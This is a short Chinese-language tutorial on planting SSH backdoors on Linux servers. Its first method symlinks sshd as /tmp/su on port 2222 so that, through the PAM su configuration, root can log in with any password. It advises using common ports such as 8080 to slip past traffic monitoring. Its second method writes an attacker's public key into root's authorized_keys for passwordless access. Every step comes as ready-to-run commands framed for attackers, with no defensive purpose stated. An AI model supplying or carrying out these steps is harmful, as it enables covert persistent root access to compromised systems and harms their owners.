SSHD軟連接后門
軟連接后門是sshd啟用PAM認證的前提下,利用了一個PAM配置文件
將sshd文件生成軟連接,把名稱設置為su,應用在啟動中會去和PAM配置文件夾中尋找是否存在對應名稱的配置信息(su)
只要pam_rootok模塊檢測uid是0即可認證成功,這樣就導致了可以使用任意密碼登錄
開啟PAM認證機制在/etc/ssh/sshd_config文件中,設置UsePAM為yes
查看/etc/pam.d/su文件存在auth suddicient pam_rootok.so就能創建軟連接
創建用ln命令建立一個sshd軟連接后門,並開啟一個常見端口
ln -sf /usr/sbin/sshd /tmp/su
/tmp/su -oport=2222
連接然后可以ssh直接連接IP:端口,用戶為root,密碼任意輸入即可好處是能夠繞過一些網絡設備的安全流量監測,但是本地監聽端口時會很容易暴露
所以建議設置成常見端口8080、8000、8081等等
附視頻操作
利用公鑰無密碼登錄
原理是用ssh生成一個公鑰放在服務器上,我們就可以通過ssh秘鑰進行無密碼連接服務器了
首先使用攻擊主機生成rsa秘鑰
ssh-keygen -t rsa
這里有兩個文件idrsa是連接ssh所用的私鑰,idrsa.pub中的內容是公鑰
把idrsa.pub寫入服務端的authorizedkeys中
注意啊沒有這個文件的話,就自己創建一個
在root目錄下
mkdir ~/.ssh
cd .ssh
touch authorized_keys
添加權限,可加可不加。
chmod 600 ~/.ssh/authorized_keys
chmod 700 ~/.ssh
然后將公鑰idrsa.pub內容寫入文件
echo "id_rsa.pub的內容" > ~/.ssh/authorized_keys
然后就可以用ssh使用秘鑰無密碼連接主機了。
正常連接是提示輸入密碼的,寫入公鑰后無需輸入密碼。
附視頻操作